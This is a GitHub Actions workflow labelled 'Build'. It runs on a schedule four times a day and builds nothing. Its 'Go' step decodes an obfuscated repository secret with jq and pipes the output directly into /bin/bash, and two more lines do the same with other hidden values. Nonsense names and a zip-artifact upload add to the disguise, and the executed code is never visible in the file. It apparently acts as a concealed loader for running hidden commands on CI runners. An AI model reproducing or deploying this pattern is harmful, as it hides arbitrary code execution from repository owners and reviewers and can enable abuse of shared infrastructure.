name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '38 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          pnqsd403: ${{ secrets.pnqsd403 }}
        run: |
          printf '%s' "$pnqsd403" | jq -r .zp2 | /bin/bash
          echo $c978 | jq -r .c9794 | /bin/bash
          echo $i3530 | jq -r .sg506 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: WfXByhbr
          path: "*.zip"
          retention-days: 1
